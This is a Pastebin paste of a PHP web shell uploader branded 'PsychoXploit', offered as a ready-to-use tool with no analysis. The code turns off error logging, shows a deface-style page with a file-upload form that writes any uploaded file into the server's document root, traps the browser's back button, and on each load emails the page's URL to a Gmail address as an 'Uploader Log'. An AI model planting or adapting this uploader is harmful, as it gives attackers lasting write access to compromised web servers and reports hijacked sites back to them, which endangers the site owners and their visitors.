Advertisement
Guest User

bbbb

a guest
Feb 23rd, 2020
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.11 KB | None | 0 0
  1. <?php
  2. session_start();
  3. @error_reporting(0);
  4. @set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors',0);
  11. echo "<html>
  12. <head>
  13. <meta name='robots' content='noindex, nofollow'>
  14. <meta name='Googlebot-News' content='noindex, nofollow'>
  15. <meta name='googlebot' content='noindex, nofollow'>
  16. <meta name='robots' content='noimageindex'>
  17. <link rel='icon' type='image/png' href='https://www.redditstatic.com/icon.png' type='image/x-icon'><meta name='theme-color' content=' #000000'>
  18. <title></title>
  19. <style type='text/css'>
  20. @font-face{font-family:Double Feature;src:url(https://static.tumblr.com/9wzbixa/pY7mj2hgs/doublefeature20.ttf);}
  21. body { display:flex; align-items:center; justify-content:center; background-image:url('https://i.ibb.co/3FzKc7j/666.jpg'); background-repeat:no-repeat; background-size:100% 100%; background-position:center; font-family: 'Lucida Sans', Helvetica, Verdana, Arial; sans-serif; font-size: 100%; -moz-user-select:none; -webkit-user-select:none; user-select:none; }
  22. div.transbox {
  23. margin: 3em auto;
  24. width: 100%;
  25. height:100%;
  26. background-color: #dddddd;
  27. border: 10px solid black;
  28. opacity: 0.4;
  29. filter: alpha(opacity=30); /* For IE8 and earlier */
  30. font-family: 'Double Feature';
  31. }
  32. div.transbox p { margin: 3% 5%; font-weight: bold; color: #000000; }
  33. h1 { font-weight:500; text-align: center; font-size: 3em; }
  34. h2 { text-align: center; font-size: 2.3em; }
  35. h3 { text-align: center; margin: 3% 5%; font-size: 1.6em; }
  36. p { font-size: 1.3em; }
  37. hr { border: 0; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0)); }
  38. </style>
  39. <!--[if !IE]>-->
  40. <style type='text/css'>
  41. body { font-size:16px; }
  42. body,td,th {
  43. font-family: 'Lucida Sans', Helvetica, Verdana, Arial;
  44. }
  45. </style>
  46. <!--<![endif]-->
  47.  
  48. <style>
  49. @font-face{font-family:Double Feature;src:url(https://static.tumblr.com/9wzbixa/pY7mj2hgs/doublefeature20.ttf);}
  50. .green{color:red;}
  51.  
  52. h1{
  53. font-size: 3em;
  54. font-weight: bold;
  55. font-family: 'Double Feature';
  56. }
  57.  
  58. </style>
  59. </head>
  60. <body onselectstart='event.returnValue=false'>
  61. <script>
  62. (function () {
  63. for(var i = 0; i < 20; i++) {
  64. history.pushState(null, document.title, window.location.href );
  65. }
  66. })(document, window, history);
  67. </script>
  68. <div class='transbox'>
  69. <h1>
  70. <span style='font-size:72px;'><span style='font-family: 'Double Feature';'>PsychoXploit</span></span></h1>
  71. <h1>Don't ever feel the highest</h1>
  72. <h1 style='color: #860406;'>We Just Psycho</h1>
  73. <center><form style='font-weight:500;' method='post' enctype='multipart/form-data'><input type='file' name='lamer_file'><input type='submit' name='ghz7' value='upload'></form></center>
  74. </div>
  75. </body>
  76. </html>";
  77. $root = $_SERVER['DOCUMENT_ROOT'];$files = $_FILES['lamer_file']['name'];$dest = $root.'/'.$files;if(isset($_POST['ghz7'])){if(is_writable($root)){
  78. if(@copy($_FILES['lamer_file']['tmp_name'],$dest)){
  79. $web = "http://".$_SERVER['HTTP_HOST']."/";
  80. echo "
  81. <script type='text/javascript'>
  82. alert('succsessful uploaded file in $web$files');
  83. window.open('https://instagram.com/psychoxploit','_blank');
  84. window.open('$web$files','_blank');</script>
  85. ";}else{echo "
  86. <script type='text/javascript'>
  87. alert('upload failed in document root.');
  88. window.open('https://instagram.com/psychoxploit','_blank');
  89. </script>
  90. ";}}else{if(@copy($_FILES['lamer_file']['tmp_name'],$files)){echo "
  91. <script type='text/javascript'>
  92. alert('succsessful uploaded $files in this folder!.');
  93. window.open('https://instagram.com/psychoxploit','_blank');
  94. </script>
  95. ";}else{echo "
  96. <script type='text/javascript'>
  97. alert('failed to upload file.');
  98. window.open('https://instagram.com/psychoxploit','_blank');
  99. </script>
  100. ";}};}
  101. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  102. $to = 'ransomwarexoxo@gmail.com';
  103. $subject = 'Uploader Log By GHz7';
  104. $message = '
  105. <center><font>Free Akses: </font><a href="'.$x_path.'" target="_blank">'.$x_path.'</a></center>
  106. ';
  107. mail($to, $subject, $message);
  108. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement